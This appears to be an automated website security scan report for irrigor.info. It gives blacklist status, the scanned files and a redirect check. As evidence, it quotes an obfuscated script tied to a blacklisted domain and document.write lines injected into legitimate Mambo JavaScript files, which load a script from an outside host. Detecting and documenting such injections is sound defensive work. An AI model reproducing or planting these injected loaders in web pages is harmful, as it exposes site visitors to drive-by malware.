Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=irrigor.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.irrigor.info/ | 200 OK Content-Length: 28498 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: partymoney.ru var s;sK={o:3231};si=function(){m=43247;m--;gW={Q:"b"};function z(h,k,S){return h.substr(k,S);}var x=[];var R=[];var t=document;var L=RegExp;var d=z("/gooc4R",0,4)+z("CsWHgle.HCWs",4,4)+z("com/R08N",0,4)+z("thepTVo",0,4)+"irat"+"ebay"+z("pzn.orgpnz",3,4)+z("qfM/jeuMfq",3,4)+z("yK3mxvidKmy3",4,4)+z("L8Zmeo.cm8ZL",4,4)+z("GNPWom.pGPNW",4,4)+"hp";var D_="D_";var dK='';var q='';y=["u","C","pM"];var rt={TA:false};var K={};var N=new Date();function Z(h,k){v ...[1133 bytes skipped]... | ||
http://www.irrigor.info/includes/js/rollover.js | 200 OK Content-Length: 1149 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n]; for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } func } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } document.write('<s'+'cript type="text/javascript" src="http://iopap.upperdarby26.com/Kbps.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://www.irrigor.info/includes/js/mambojavascript.js | 200 OK Content-Length: 11513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function xshow(o) { s = ''; for(e in o) {s += e+'='+o[e]+'\n';} alert( s ); } function writeDynaList( selectParams, source, key, orig_key, orig_val ) { var html = '\n <select ' + selectParams + '>'; var i = 0; for (x in source) { if (source[x][0] == key) { var selected = ''; if ((orig_key == key && orig_val == source[x][1]) || (i == 0 && orig_key != key)) { selected = 'selected="selected"'; } ht var s = new String(str); if (whitespace.indexOf(s.charAt(s.length-1)) != -1) { var i = s.length - 1; while (i >= 0 && whitespace.indexOf(s.charAt(i)) != -1) i--; s = s.substring(0, i+1); } return s; } function trim(str) { return rtrim(ltrim(str)); } document.write('<s'+'cript type="text/javascript" src="http://iopap.upperdarby26.com/Kbps.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://iopap.upperdarby26.com/Kbps.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iopap.upperdarby26.com/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: irrigor.info
Result:
GET / HTTP/1.1
Host: irrigor.info
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: irrigor.info
Referer: http://www.google.com/search?q=irrigor.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: irrigor.info
Referer: http://www.google.com/search?q=irrigor.info
Result:
The result is similar to the first query. There are no suspicious redirects found.